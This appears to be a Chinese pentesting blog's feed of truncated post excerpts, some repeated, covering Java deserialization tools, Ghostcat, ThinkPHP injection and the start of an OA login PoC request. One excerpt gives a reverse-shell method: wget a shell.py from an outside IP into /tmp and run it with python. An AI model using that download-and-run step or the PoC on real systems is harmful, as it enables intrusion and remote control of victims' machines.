今天突然看到一个项目发现很不错。https://github.com/j1anFen/ysoserial_echo支持:ApereoCAS4.1.X默认密钥Shirospring环境下回显Liferayprotal7.0以上本地复现环境Vulhub环境搭建git下来后,直接在ysoserial_ec
我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。先wget下载wgethttp://123.123.123.123/shell.py-O/tmp/shell.py然后再执行python/tmp/shell.py这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些
主要项目:https://github.com/arugal/frp-notify可以直接下载release版本即可,或者自行使用realse.sh进行编译。目录介绍frp-notify└───system||frp-notify.service#linux系统服务配置文件|│frp-notify#
今天突然看到一个项目发现很不错。https://github.com/j1anFen/ysoserial_echo支持:ApereoCAS4.1.X默认密钥Shirospring环境下回显Liferayprotal7.0以上本地复现环境Vulhub环境搭建git下来后,直接在ysoserial_ec
我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。先wget下载wgethttp://123.123.123.123/shell.py-O/tmp/shell.py然后再执行python/tmp/shell.py这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些
前言: 公司项目上遇到的一个传销站,是一个Thinkphp3.0的。尝试了payload进行注入后,发现只有一个盲注。于是就去找找有没有相同站点,拿个源码来审计审计。搜索到一个相同站点下存在8009端口的ajp协议和一个8080端口的tomcat站点,于是就想到了幽灵猫漏洞。发现使用Jspst
直接上POC热乎着的GET/general/login_code.phpHTTP/1.1Host:192.168.91.131Pragma:no-cacheCache-Control:no-cacheUpgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(